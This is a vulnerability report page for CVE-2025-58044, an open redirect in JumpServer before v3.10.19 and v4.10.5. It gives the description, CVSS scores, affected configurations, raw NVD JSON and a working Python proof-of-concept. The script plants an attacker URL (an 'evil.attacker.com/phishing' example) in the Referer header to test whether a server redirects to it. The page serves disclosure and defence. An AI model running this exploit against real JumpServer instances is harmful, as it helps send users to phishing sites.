Security Vulnerability Report
中文
CVE-2025-58044 CVSS 6.1 MEDIUM

CVE-2025-58044

Published: 2025-12-01 21:15:52
Last Modified: 2025-12-05 19:48:05
Source: [email protected]

Description

JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v3.10.19 and v4.10.5, The /core/i18n// endpoint uses the Referer header as the redirection target without proper validation, which could lead to an Open Redirect vulnerability. This vulnerability is fixed in v3.10.19 and v4.10.5.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* - VULNERABLE
JumpServer < v3.10.19
JumpServer < v4.10.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def exploit_open_redirect(target_url, redirect_target): """ PoC for CVE-2025-58044: JumpServer Open Redirect Vulnerability Args: target_url: Base URL of vulnerable JumpServer instance redirect_target: Malicious URL to redirect victims to Returns: Response headers showing the redirect """ endpoint = f"{target_url.rstrip('/')}/core/i18n/" headers = { 'Referer': redirect_target, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } try: response = requests.get(endpoint, headers=headers, allow_redirects=False, timeout=10) print(f"[*] Target: {endpoint}") print(f"[*] Malicious Referer: {redirect_target}") print(f"[*] Status Code: {response.status_code}") if 'Location' in response.headers: print(f"[*] Redirect Location: {response.headers['Location']}") if redirect_target in response.headers.get('Location', ''): print("[!] VULNERABLE: Open redirect confirmed!") return True print("[-] No open redirect detected") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: python {sys.argv[0]} <target_url> <redirect_url>") print(f"Example: python {sys.argv[0]} https://jumpserver.example.com https://evil.attacker.com/phishing") sys.exit(1) exploit_open_redirect(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58044", "sourceIdentifier": "[email protected]", "published": "2025-12-01T21:15:51.807", "lastModified": "2025-12-05T19:48:05.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v3.10.19 and v4.10.5, The /core/i18n// endpoint uses the Referer header as the redirection target without proper validation, which could lead to an Open Redirect vulnerability. This vulnerability is fixed in v3.10.19 and v4.10.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.19", "matchCriteriaId": "E81ADCFD-E0E8-48C3-B232-2A50132C47B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.10.5", "matchCriteriaId": "3E2FED16-0348-4675-9FF2-FA0DAF4433D4"}]}]}], "references": [{"url": "https://github.com/jumpserver/jumpserver/commit/36ae076cb021f16d2053a63651bc16d15a3ed53b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jumpserver/jumpserver/security/advisories/GHSA-h762-mj7p-jwjq", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.